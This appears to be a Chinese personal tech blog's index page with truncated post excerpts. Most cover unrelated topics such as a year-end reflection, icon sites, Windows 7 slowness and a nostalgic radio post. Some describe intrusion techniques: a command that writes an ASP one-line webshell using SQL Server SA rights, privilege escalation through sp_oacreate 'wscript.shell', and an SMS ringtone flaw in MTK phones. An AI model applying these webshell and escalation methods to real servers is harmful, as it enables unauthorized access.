写在09年的最后一天,以纪念,即将逝去的一年。或者说,这是一种自我安慰,想挽留着这一年的时光。 09年最后一天里,在家乡度过的,阴沉沉的天,冷冷的天气,见不到阳光的微笑。今天适合坐在家里,看看书,回忆些09年的往事,可脑子不听使唤,回忆总是绕着代码那里徘徊。 今天的流走,时光的飞逝,大家在这一年收获的不少东西吧。 不知道为什么,感觉09年的过去,并不单单代表着一年的过去,而是十年。就像上世纪的八十年代、九十年代,都是以十年为单位的,所...阅读更多
MTK方案4种手机短信漏洞
影响手机品牌:所有MTK方案手机(也就是我们常说的山寨手机) 且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能(大部分山寨手机都有此功能) 漏洞原理: 在大部分MTK方案手机中,编写短信息的时候可以插入一种“imy”格式的铃声文件, 而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声 由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。 所以我们可以在“imy”文件内插入代码,通过代码调用手机的解码芯片发出一些...阅读更多
4款ICON图标搜索网站
Iconfinder 这是其中一个最好的图标搜索引擎,在它们的数据库里面存储了超过1000多个图标资源,你可以输入一个你需要的相关的图标关键词进行搜索。 其Ajax的导航,使一件轻而易举的找到新的图标。每个图标在搜索结果中进行,其标记,下载链接和许可证信息。 无需翻阅页面得到下载图标,击中下载图标,该图标将被下载。大部分的图标漂亮,可以用来在现代或Web 2.0的设计。 Iconlet 另一个图标搜索引擎,它也运作良好。 在这里你会得到很多更多的图标下载,但结果并不很清楚分类,你...阅读更多
了解SA权限九种上传方法
SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家能分享出来. 1、NBSI的命令方法:写入一句话木SHELL,命令如下: 1 echo ^<25%execute request("#")25%^> >d:\web\mm.asp 这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop “服务名”可以停掉服务。 2、NBSI3.0自带文件上传功能,也可以使用。缺点速度慢。建议上传短小的WEBSHELL。 3、把一句话...阅读更多
无xp_cmdshell提权
有了sa但无xp_cmdshell ,怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块,反正我遇到好多次了。在用exec sp_oacreate ‘wscript.shell’也没办法的情况下。。可用此方法 (很多服务器都把 ‘wscript.shell’给删了。) 看到既然能用sp_oacreate,sp_oamethod来弄 ‘wscript.shell’或者scripting.filesystemobject 网上看到的文章都只有几个用法就是 ‘wscript.shell’执行命令或者scripting.filesystemobject来写...阅读更多
清除木马+修补漏洞=彻底解决网站挂马问题
清除木马 1、找挂马的标签,预防网站入侵 比如有<script language=”javascript” src=”网马地址”></script>或<iframe width=420 height=330 frameborder=0 scrolling=auto src=网马地址></iframe>,或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马,一般是JS挂马。 2、找到了恶意代码后,接下来就是清马,如果是网页被挂马,可以用手动清,也可以用批量清,网页清马比较简单,这里就不详细讲,现在着重讲一下SQL数据库 ...阅读更多
禁止QQ或其他程序上网的vbs脚本代码
用vbs查找系统进程,发现qq的进程则杀掉就是这段代码的原理 1 2 3 4 5 6 7 8 9 10 dim bag,pipe,honker,good do good="." set bag=getobject("winmgmts:\\"&good&"\root\cimv2") set pipe=bag.execquery("select * from win32_process where name='QQ.exe'") for each i in pipe i.terminate() next wscript.sleep 1 loop 大家注意到了上边的QQ.EXE了吧,这个是可以改成其他的,所以这里不单独针对QQ! 文章地...阅读更多
一招就能拒绝全部的恶意程序
如果你是Windows2k 或xp的用户,那么你一仔细看咯,在这里教大家一招金蝉脱窍 ―― 而且只需要这一招克就能死所有病毒!! 如果你是新装的系统(或者是你能确认你的系统当前是无毒的),那就再好不过了,现在就立即就打开: “开始→程序→管理工具→计算机管理→本地用户和组→用户” 首先就是把超级管理员密码更改成十位数以上,然后再建立一个用户,把它的密码也设置成十位以上并且提升为超级管理员。这样做的目的是为了双保险:如果你忘记了其中一个密码,还有使用另一个超...阅读更多
Windows 7系统变慢的原因
如果你是从M1到Beta,再从RC到RTM,你都在不断的试用Windows 7的老用户,你会发现,在使用了Windows 7 Windows照片查看器之后,部分用户的系统速度会变慢。特别是当你用Windows照片查看器查看一些图片格式的文件时,系统调用过程明显“迟钝”。 上述操作造成Windows 7系统被拖慢的原因在于,启用“使用Windows 7显示器校准”。 小知识:为什么启用“使用Windows 7显示器校准”会拖慢系统? 使用Windows 7自带的颜色校正功能会在系统内产生一个ICC配置文件,此后,当用户浏...阅读更多
怀念KissRadio
寻找着她的声音,记得小的时候睡觉前还会听着她的KissRadio,音乐不听话。有六、七年时间了吧,那时候是一种寄托。现在还有许多人在寻找着你,还有你的声音。希望夜晚来临的时候,你的故事并没有结束。 找了很久,遗憾的是只找到片花的声音。如果不保存,我想片花的声音也不会找不到了。 11月17日,我的晚上就这样度过了。 这是其中一段片花(生命是一场意外) Audio clip: Adobe Flash Player (version 9 or above) is required to play this audio clip. Download the latest versi...阅读更多